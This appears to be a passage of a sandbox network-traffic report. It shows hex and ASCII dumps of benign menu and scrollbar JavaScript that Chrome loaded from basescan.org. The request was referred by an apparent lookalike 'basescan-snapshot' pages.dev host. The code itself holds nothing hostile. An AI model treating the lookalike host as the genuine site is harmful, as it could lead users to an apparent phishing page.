                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 4d 65 6e 75 2e 64 65 66 61 75 6c 74 73 3d 7b 65 76 65 6e 74 3a 27 68 6f 76 65 72 27 2c 64 69 72 65 63 74 69 6f 6e 3a 27 68 6f 72 69 7a 6f 6e 74 61 6c 27 2c 62 72 65 61 6b 70 6f 69 6e 74 3a 39 39 31 2c 61 6e 69 6d 61 74 69 6f 6e 49 6e 3a 66 61 6c 73 65 2c 61 6e 69 6d 61 74 69 6f 6e 4f 75 74 3a 66 61 6c 73 65 2c 72 74 6c 3a 66 61 6c 73 65 2c 68 69 64 65 54 69 6d 65 4f 75 74 3a 33 30 30 2c 73 69 64 65 42 61 72 52 61 74 69 6f 3a 31 2f 34 2c 70 61 67 65 43 6f 6e 74 61 69 6e 65 72 3a 24 28 27 62 6f 64 79 27 29 2c 63 6c 61 73 73 4d 61 70 3a 7b 69 6e 69 74 69 61 6c 69 7a 65 64 3a 27 2e 68 73 2d 6d 65 6e 75 2d 69 6e 69 74 69 61 6c 69 7a 65 64 27 2c 6d 6f 62 69 6c 65 53 74 61 74 65 3a 27 2e 68 73 2d 6d 6f 62 69 6c 65 2d 73 74 61 74 65 27 2c 73 75 62 4d 65 6e 75 3a
                                                                                                                                                                                                                                              Data Ascii: Menu.defaults={event:'hover',direction:'horizontal',breakpoint:991,animationIn:false,animationOut:false,rtl:false,hideTimeOut:300,sideBarRatio:1/4,pageContainer:$('body'),classMap:{initialized:'.hs-menu-initialized',mobileState:'.hs-mobile-state',subMenu:
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 2e 74 61 72 67 65 74 29 29 29 3b 7d 29 3b 7d 0a 24 77 2e 6f 6e 28 27 6b 65 79 75 70 2e 48 53 4d 65 67 61 4d 65 6e 75 27 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 2e 6b 65 79 43 6f 64 65 26 26 65 2e 6b 65 79 43 6f 64 65 3d 3d 3d 32 37 29 7b 73 65 6c 66 2e 63 6c 6f 73 65 41 6c 6c 28 29 3b 73 65 6c 66 2e 6f 70 74 69 6f 6e 73 2e 69 73 4d 65 6e 75 4f 70 65 6e 65 64 3d 66 61 6c 73 65 3b 7d 7d 29 3b 69 66 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 72 65 61 6b 70 6f 69 6e 74 29 74 68 69 73 2e 69 6e 69 74 4d 6f 62 69 6c 65 42 65 68 61 76 69 6f 72 28 29 3b 65 6c 73 65 20 69 66 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 72 65 61 6b 70 6f 69 6e
                                                                                                                                                                                                                                              Data Ascii: .target)));});}$w.on('keyup.HSMegaMenu',function(e){if(e.keyCode&&e.keyCode===27){self.closeAll();self.options.isMenuOpened=false;}});if(window.innerWidth<=this.options.breakpoint)this.initMobileBehavior();else if(window.innerWidth>this.options.breakpoin
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 73 53 75 62 4d 65 6e 75 2b 27 3a 6e 6f 74 28 5b 64 61 74 61 2d 65 76 65 6e 74 3d 22 63 6c 69 63 6b 22 5d 29 27 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 24 28 74 68 69 73 29 2e 64 61 74 61 28 27 48 53 4d 65 6e 75 49 74 65 6d 27 29 29 72 65 74 75 72 6e 3b 76 61 72 20 24 74 68 69 73 3d 24 28 74 68 69 73 29 2c 48 53 4d 65 6e 75 49 74 65 6d 3d 24 74 68 69 73 2e 64 61 74 61 28 27 48 53 4d 65 6e 75 49 74 65 6d 27 29 2c 24 63 68 61 69 6e 3d 24 28 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 29 2e 70 61 72 65 6e 74 73 28 73 65 6c 66 2e 69 74 65 6d 73 53 65 6c 65 63 74 6f 72 29 3b 48 53 4d 65 6e 75 49 74 65 6d 2e 68 69 64 65 54 69 6d 65 4f 75 74 49 64 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 6c 66 2e 63 6c 6f 73 65 41 6c
                                                                                                                                                                                                                                              Data Ascii: sSubMenu+':not([data-event="click"])',function(e){if(!$(this).data('HSMenuItem'))return;var $this=$(this),HSMenuItem=$this.data('HSMenuItem'),$chain=$(e.relatedTarget).parents(self.itemsSelector);HSMenuItem.hideTimeOutId=setTimeout(function(){self.closeAl
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 79 70 65 28 24 74 68 69 73 29 29 3b 7d 0a 73 65 6c 66 2e 63 6c 6f 73 65 41 6c 6c 28 24 74 68 69 73 2e 61 64 64 28 24 74 68 69 73 2e 70 61 72 65 6e 74 73 28 73 65 6c 66 2e 69 74 65 6d 73 53 65 6c 65 63 74 6f 72 29 29 29 3b 48 53 4d 65 6e 75 49 74 65 6d 3d 24 74 68 69 73 2e 61 64 64 43 6c 61 73 73 28 27 68 73 2d 65 76 65 6e 74 2d 70 72 65 76 65 6e 74 65 64 27 29 2e 64 61 74 61 28 27 48 53 4d 65 6e 75 49 74 65 6d 27 29 3b 69 66 28 48 53 4d 65 6e 75 49 74 65 6d 2e 69 73 4f 70 65 6e 65 64 29 7b 48 53 4d 65 6e 75 49 74 65 6d 2e 64 65 73 6b 74 6f 70 48 69 64 65 28 29 3b 7d 65 6c 73 65 7b 48 53 4d 65 6e 75 49 74 65 6d 2e 64 65 73 6b 74 6f 70 53 68 6f 77 28 29 3b 7d 0a 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 65 2e 73 74 6f 70 50 72 6f 70 61 67 61
                                                                                                                                                                                                                                              Data Ascii: ype($this));}self.closeAll($this.add($this.parents(self.itemsSelector)));HSMenuItem=$this.addClass('hs-event-prevented').data('HSMenuItem');if(HSMenuItem.isOpened){HSMenuItem.desktopHide();}else{HSMenuItem.desktopShow();}e.preventDefault();e.stopPropaga
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 73 3d 24 28 74 68 69 73 29 2c 24 70 61 72 65 6e 74 3d 24 74 68 69 73 2e 70 61 72 65 6e 74 28 29 2c 48 53 4d 65 6e 75 49 74 65 6d 3b 69 66 28 21 24 70 61 72 65 6e 74 2e 64 61 74 61 28 27 48 53 4d 65 6e 75 49 74 65 6d 27 29 29 7b 73 65 6c 66 2e 69 6e 69 74 4d 65 6e 75 49 74 65 6d 28 24 70 61 72 65 6e 74 2c 73 65 6c 66 2e 67 65 74 54 79 70 65 28 24 70 61 72 65 6e 74 29 29 3b 7d 0a 48 53 4d 65 6e 75 49 74 65 6d 3d 24 70 61 72 65 6e 74 2e 64 61 74 61 28 27 48 53 4d 65 6e 75 49 74 65 6d 27 29 3b 69 66 28 24 74 68 69 73 2e 69 73 28 27 3a 66 6f 63 75 73 27 29 29 7b 69 66 28 65 2e 6b 65 79 43 6f 64 65 26 26 65 2e 6b 65 79 43 6f 64 65 3d 3d 3d 34 30 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 48 53 4d 65 6e 75 49 74 65 6d 2e 64 65 73 6b 74 6f 70
                                                                                                                                                                                                                                              Data Ascii: s=$(this),$parent=$this.parent(),HSMenuItem;if(!$parent.data('HSMenuItem')){self.initMenuItem($parent,self.getType($parent));}HSMenuItem=$parent.data('HSMenuItem');if($this.is(':focus')){if(e.keyCode&&e.keyCode===40){e.preventDefault();HSMenuItem.desktop
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 75 49 74 65 6d 49 6e 73 74 61 6e 63 65 3b 69 66 28 21 24 74 68 69 73 2e 64 61 74 61 28 27 48 53 4d 65 6e 75 49 74 65 6d 27 29 29 7b 73 65 6c 66 2e 69 6e 69 74 4d 65 6e 75 49 74 65 6d 28 24 74 68 69 73 2c 73 65 6c 66 2e 67 65 74 54 79 70 65 28 24 74 68 69 73 29 29 3b 7d 0a 73 65 6c 66 2e 63 6c 6f 73 65 41 6c 6c 28 24 74 68 69 73 2e 70 61 72 65 6e 74 73 28 73 65 6c 66 2e 69 74 65 6d 73 53 65 6c 65 63 74 6f 72 29 2e 61 64 64 28 24 74 68 69 73 29 29 3b 4d 65 6e 75 49 74 65 6d 49 6e 73 74 61 6e 63 65 3d 24 74 68 69 73 2e 64 61 74 61 28 27 48 53 4d 65 6e 75 49 74 65 6d 27 29 3b 69 66 28 4d 65 6e 75 49 74 65 6d 49 6e 73 74 61 6e 63 65 2e 69 73 4f 70 65 6e 65 64 29 7b 4d 65 6e 75 49 74 65 6d 49 6e 73 74 61 6e 63 65 2e 6d 6f 62 69 6c 65 48 69 64 65 28 29 3b 7d 65
                                                                                                                                                                                                                                              Data Ascii: uItemInstance;if(!$this.data('HSMenuItem')){self.initMenuItem($this,self.getType($this));}self.closeAll($this.parents(self.itemsSelector).add($this));MenuItemInstance=$this.data('HSMenuItem');if(MenuItemInstance.isOpened){MenuItemInstance.mobileHide();}e
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 29 29 3f 27 6d 65 67 61 2d 6d 65 6e 75 27 3a 6e 75 6c 6c 29 3b 7d 3b 4d 65 67 61 4d 65 6e 75 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 53 74 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 74 61 74 65 3b 7d 3b 4d 65 67 61 4d 65 6e 75 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 66 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 2e 61 64 64 28 74 68 69 73 2e 5f 74 65 6d 70 43 68 61 69 6e 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 69 2c 65 6c 29 7b 24 28 65 6c 29 2e 64 61 74 61 28 27 48 53 4d 65 6e 75 49 74 65 6d 27 29 2e 5f 75 70 64 61 74 65 4d 65 6e 75 42 6f 75 6e 64 73 28 29 3b 7d 29 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 4d 65 6e 75 49 74 65 6d 28 65 6c 65 6d 65 6e 74
                                                                                                                                                                                                                                              Data Ascii: ))?'mega-menu':null);};MegaMenu.prototype.getState=function(){return this.state;};MegaMenu.prototype.refresh=function(){return this._items.add(this._tempChain).each(function(i,el){$(el).data('HSMenuItem')._updateMenuBounds();});};function MenuItem(element
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6e 73 2e 61 6e 69 6d 61 74 69 6f 6e 4f 75 74 29 29 7b 73 65 6c 66 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 73 65 6c 66 2e 61 63 74 69 76 65 49 74 65 6d 43 6c 61 73 73 2e 73 6c 69 63 65 28 31 29 29 3b 73 65 6c 66 2e 6f 70 74 69 6f 6e 73 2e 61 66 74 65 72 43 6c 6f 73 65 2e 63 61 6c 6c 28 73 65 6c 66 2c 73 65 6c 66 2e 24 65 6c 65 6d 65 6e 74 2c 73 65 6c 66 2e 6d 65 6e 75 29 3b 7d 0a 69 66 28 73 65 6c 66 2e 6d 65 6e 75 2e 68 61 73 43 6c 61 73 73 28 73 65 6c 66 2e 6f 70 74 69 6f 6e 73 2e 61 6e 69 6d 61 74 69 6f 6e 49 6e 29 29 7b 73 65 6c 66 2e 6f 70 74 69 6f 6e 73 2e 61 66 74 65 72 4f 70 65 6e 2e 63 61 6c 6c 28 73 65 6c 66 2c 73 65 6c 66 2e 24 65 6c 65 6d 65 6e 74 2c 73 65 6c 66 2e 6d 65 6e 75 29 3b 7d 0a 65 2e 73 74 6f 70 50 72 6f 70
                                                                                                                                                                                                                                              Data Ascii: ns.animationOut)){self.$element.removeClass(self.activeItemClass.slice(1));self.options.afterClose.call(self,self.$element,self.menu);}if(self.menu.hasClass(self.options.animationIn)){self.options.afterOpen.call(self,self.$element,self.menu);}e.stopProp
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 28 7b 64 75 72 61 74 69 6f 6e 3a 73 65 6c 66 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 62 69 6c 65 53 70 65 65 64 2c 65 61 73 69 6e 67 3a 73 65 6c 66 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 62 69 6c 65 45 61 73 69 6e 67 2c 63 6f 6d 70 6c 65 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 6c 66 2e 6f 70 74 69 6f 6e 73 2e 61 66 74 65 72 4f 70 65 6e 2e 63 61 6c 6c 28 73 65 6c 66 2c 73 65 6c 66 2e 24 65 6c 65 6d 65 6e 74 2c 73 65 6c 66 2e 6d 65 6e 75 29 3b 7d 7d 29 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 64 64 43 6c 61 73 73 28 74 68 69 73 2e 61 63 74 69 76 65 49 74 65 6d 43 6c 61 73 73 2e 73 6c 69 63 65 28 31 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 3b 7d 3b 4d 65 6e 75 49 74 65 6d 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 6f 62 69 6c 65 48 69 64 65 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                                              Data Ascii: ({duration:self.options.mobileSpeed,easing:self.options.mobileEasing,complete:function(){self.options.afterOpen.call(self,self.$element,self.menu);}});this.$element.addClass(this.activeItemClass.slice(1));return this;};MenuItem.prototype.mobileHide=functi


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              87192.168.2.549823104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC656OUTGET /assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.concat.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 15 Jul 2020 08:45:00 GMT
                                                                                                                                                                                                                                              ETag: W/"08e7239845ad61:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58862
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VyaYgIrq6zYSlyddM5TVUzvyXU1jp%2Fl2y3wS%2FCjqB7TdpI3NnGuD3y0g7GjnQxCBjiiB8g%2FA6ddTDm3cVwwXhdAhoz7Y0CqDDE1XawWddZRkUbP856pRnIZZ7OL5QA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2dbeffc6a4f-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC554INData Raw: 37 63 37 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 3a 65 28 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6f 2c 61 2c 6e 2c 69 2c 72 2c 6c 2c 73 2c 63 2c 64 2c 75 2c 66 2c 68 2c 6d 2c 70 2c 67 2c 76 2c 78 2c 5f 2c 77 2c 53 2c 62 2c 43 2c 79 2c 42 2c 54 2c 6b 2c 4d 2c 4f 2c 49 2c 44 2c 45 2c 57 2c 52 2c 41 2c 4c 2c 7a 2c
                                                                                                                                                                                                                                              Data Ascii: 7c72!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"undefined"!=typeof module&&module.exports?module.exports=e:e(jQuery,window,document)}(function(e){var t,o,a,n,i,r,l,s,c,d,u,f,h,m,p,g,v,x,_,w,S,b,C,y,B,T,k,M,O,I,D,E,W,R,A,L,z,
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 69 70 74 20 73 72 63 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 2b 22 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2d 6d 6f 75 73 65 77 68 65 65 6c 2f 33 2e 31 2e 31 33 2f 6a 71 75 65 72 79 2e 6d 6f 75 73 65 77 68 65 65 6c 2e 6d 69 6e 2e 6a 73 25 33 45 25 33 43 2f 73 63 72 69 70 74 25 33 45 22 29 29 29 2c 6f 3d 22 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 62 61 72 22 2c 61 3d 22 6d 43 53 22 2c 6e 3d 22 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 62 61 72 22 2c 69 3d 7b 73 65 74 54 6f 70 3a 30 2c 73 65 74 4c 65 66 74 3a 30 2c 61 78 69 73 3a 22 79 22 2c 73 63 72 6f 6c 6c 62 61 72 50 6f 73 69 74 69 6f 6e 3a 22 69 6e 73 69 64 65 22 2c 73 63 72 6f 6c 6c 49 6e 65 72 74 69 61 3a 39 35 30 2c 61 75 74 6f 44 72 61 67 67
                                                                                                                                                                                                                                              Data Ascii: ipt src="+window.location.origin+"/assets/vendor/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js%3E%3C/script%3E"))),o="mCustomScrollbar",a="mCS",n=".mCustomScrollbar",i={setTop:0,setLeft:0,axis:"y",scrollbarPosition:"inside",scrollInertia:950,autoDragg
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 7c 7c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 7c 7c 6e 2c 63 3d 65 28 73 29 3b 69 66 28 22 6f 66 66 22 3d 3d 3d 74 2e 6c 69 76 65 29 72 65 74 75 72 6e 20 76 6f 69 64 20 6d 28 73 29 3b 6c 5b 73 5d 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 62 61 72 28 74 29 2c 22 6f 6e 63 65 22 3d 3d 3d 74 2e 6c 69 76 65 26 26 63 2e 6c 65 6e 67 74 68 26 26 6d 28 73 29 7d 2c 35 30 30 29 7d 65 6c 73 65 20 6d 28 73 29 3b 72 65 74 75 72 6e 20 74 2e 73 65 74 57 69 64 74 68 3d 74 2e 73 65 74 5f 77 69 64 74 68 3f 74 2e 73 65 74 5f 77 69 64 74 68 3a 74 2e 73 65 74 57 69 64 74 68 2c 74 2e 73 65 74 48 65 69 67 68 74 3d 74 2e 73 65 74 5f 68 65 69 67 68 74 3f 74 2e 73 65 74 5f 68 65 69 67 68 74 3a 74 2e 73 65 74 48
                                                                                                                                                                                                                                              Data Ascii: ||this.selector||n,c=e(s);if("off"===t.live)return void m(s);l[s]=setTimeout(function(){c.mCustomScrollbar(t),"once"===t.live&&c.length&&m(s)},500)}else m(s);return t.setWidth=t.set_width?t.set_width:t.setWidth,t.setHeight=t.set_height?t.set_height:t.setH
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 61 6c 6c 62 61 63 6b 73 2e 6f 6e 43 72 65 61 74 65 2e 63 61 6c 6c 28 74 68 69 73 29 2c 65 28 22 23 6d 43 53 42 5f 22 2b 6e 2e 69 64 78 2b 22 5f 63 6f 6e 74 61 69 6e 65 72 20 69 6d 67 3a 6e 6f 74 28 2e 22 2b 64 5b 32 5d 2b 22 29 22 29 2e 61 64 64 43 6c 61 73 73 28 64 5b 32 5d 29 2c 75 2e 75 70 64 61 74 65 2e 63 61 6c 6c 28 6e 75 6c 6c 2c 6f 29 7d 7d 29 7d 2c 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 76 61 72 20 6e 3d 74 7c 7c 66 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 65 28 6e 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 65 28 74 68 69 73 29 3b 69 66 28 74 2e 64 61 74 61 28 61 29 29 7b 76 61 72 20 6e 3d 74 2e 64 61 74 61 28 61 29 2c 69 3d 6e 2e 6f 70 74 2c 72 3d 65 28 22 23 6d 43 53 42 5f 22
                                                                                                                                                                                                                                              Data Ascii: allbacks.onCreate.call(this),e("#mCSB_"+n.idx+"_container img:not(."+d[2]+")").addClass(d[2]),u.update.call(null,o)}})},update:function(t,o){var n=t||f.call(this);return e(n).each(function(){var t=e(this);if(t.data(a)){var n=t.data(a),i=n.opt,r=e("#mCSB_"
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6e 74 52 65 73 65 74 2e 78 3d 6e 75 6c 6c 29 3a 28 42 2e 63 61 6c 6c 28 74 68 69 73 29 2c 22 78 22 3d 3d 3d 69 2e 61 78 69 73 3f 6b 2e 63 61 6c 6c 28 74 68 69 73 29 3a 22 79 78 22 3d 3d 3d 69 2e 61 78 69 73 26 26 6e 2e 6f 76 65 72 66 6c 6f 77 65 64 5b 30 5d 26 26 51 28 74 2c 63 5b 30 5d 2e 74 6f 53 74 72 69 6e 67 28 29 2c 7b 64 69 72 3a 22 79 22 2c 64 75 72 3a 30 2c 6f 76 65 72 77 72 69 74 65 3a 22 6e 6f 6e 65 22 7d 29 29 29 2c 6f 26 26 6e 26 26 28 32 3d 3d 3d 6f 26 26 69 2e 63 61 6c 6c 62 61 63 6b 73 2e 6f 6e 49 6d 61 67 65 4c 6f 61 64 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 63 61 6c 6c 62 61 63 6b 73 2e 6f 6e 49 6d 61 67 65 4c 6f 61 64 3f 69 2e 63 61 6c 6c 62 61 63 6b 73 2e 6f 6e 49 6d 61 67 65 4c 6f 61 64 2e 63 61 6c 6c 28
                                                                                                                                                                                                                                              Data Ascii: ntReset.x=null):(B.call(this),"x"===i.axis?k.call(this):"yx"===i.axis&&n.overflowed[0]&&Q(t,c[0].toString(),{dir:"y",dur:0,overwrite:"none"}))),o&&n&&(2===o&&i.callbacks.onImageLoad&&"function"==typeof i.callbacks.onImageLoad?i.callbacks.onImageLoad.call(
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 29 3b 74 2e 64 61 74 61 28 61 29 26 26 56 28 74 29 7d 29 7d 2c 64 69 73 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6f 3d 66 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 65 28 6f 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 65 28 74 68 69 73 29 3b 6f 2e 64 61 74 61 28 61 29 26 26 28 6f 2e 64 61 74 61 28 61 29 2c 4e 2e 63 61 6c 6c 28 74 68 69 73 2c 22 72 65 6d 6f 76 65 22 29 2c 6b 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74 26 26 42 2e 63 61 6c 6c 28 74 68 69 73 29 2c 4d 2e 63 61 6c 6c 28 74 68 69 73 2c 21 30 29 2c 6f 2e 61 64 64 43 6c 61 73 73 28 64 5b 33 5d 29 29 7d 29 7d 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 66 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72
                                                                                                                                                                                                                                              Data Ascii: );t.data(a)&&V(t)})},disable:function(t){var o=f.call(this);return e(o).each(function(){var o=e(this);o.data(a)&&(o.data(a),N.call(this,"remove"),k.call(this),t&&B.call(this),M.call(this,!0),o.addClass(d[3]))})},destroy:function(){var t=f.call(this);retur
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6c 22 2c 22 6d 69 6e 69 6d 61 6c 2d 64 61 72 6b 22 5d 29 3e 2d 31 3f 22 6f 75 74 73 69 64 65 22 3a 74 2e 73 63 72 6f 6c 6c 62 61 72 50 6f 73 69 74 69 6f 6e 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 5b 65 5d 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6c 5b 65 5d 29 2c 5a 28 6c 2c 65 29 29 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 79 78 22 3d 3d 3d 65 7c 7c 22 78 79 22 3d 3d 3d 65 7c 7c 22 61 75 74 6f 22 3d 3d 3d 65 3f 22 79 78 22 3a 22 78 22 3d 3d 3d 65 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 65 3f 22 78 22 3a 22 79 22 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 73 74 65 70 70 65 64 22 3d 3d 3d 65 7c 7c 22 70 69 78 65 6c 73 22 3d 3d 3d 65 7c 7c 22 73 74 65 70 22 3d 3d 3d 65 7c 7c
                                                                                                                                                                                                                                              Data Ascii: l","minimal-dark"])>-1?"outside":t.scrollbarPosition},m=function(e){l[e]&&(clearTimeout(l[e]),Z(l,e))},p=function(e){return"yx"===e||"xy"===e||"auto"===e?"yx":"x"===e||"horizontal"===e?"x":"y"},g=function(e){return"stepped"===e||"pixels"===e||"step"===e||
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6e 67 44 69 72 3f 22 20 22 2b 64 5b 37 5d 3a 22 22 3b 69 2e 73 65 74 57 69 64 74 68 26 26 74 2e 63 73 73 28 22 77 69 64 74 68 22 2c 69 2e 73 65 74 57 69 64 74 68 29 2c 69 2e 73 65 74 48 65 69 67 68 74 26 26 74 2e 63 73 73 28 22 68 65 69 67 68 74 22 2c 69 2e 73 65 74 48 65 69 67 68 74 29 2c 69 2e 73 65 74 4c 65 66 74 3d 22 79 22 21 3d 3d 69 2e 61 78 69 73 26 26 22 72 74 6c 22 3d 3d 3d 6e 2e 6c 61 6e 67 44 69 72 3f 22 39 38 39 39 39 39 70 78 22 3a 69 2e 73 65 74 4c 65 66 74 2c 74 2e 61 64 64 43 6c 61 73 73 28 6f 2b 22 20 5f 22 2b 61 2b 22 5f 22 2b 6e 2e 69 64 78 2b 66 2b 68 29 2e 77 72 61 70 49 6e 6e 65 72 28 22 3c 64 69 76 20 69 64 3d 27 6d 43 53 42 5f 22 2b 6e 2e 69 64 78 2b 22 27 20 63 6c 61 73 73 3d 27 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 42 6f 78 20
                                                                                                                                                                                                                                              Data Ascii: ngDir?" "+d[7]:"";i.setWidth&&t.css("width",i.setWidth),i.setHeight&&t.css("height",i.setHeight),i.setLeft="y"!==i.axis&&"rtl"===n.langDir?"989999px":i.setLeft,t.addClass(o+" _"+a+"_"+n.idx+f+h).wrapInner("<div id='mCSB_"+n.idx+"' class='mCustomScrollBox
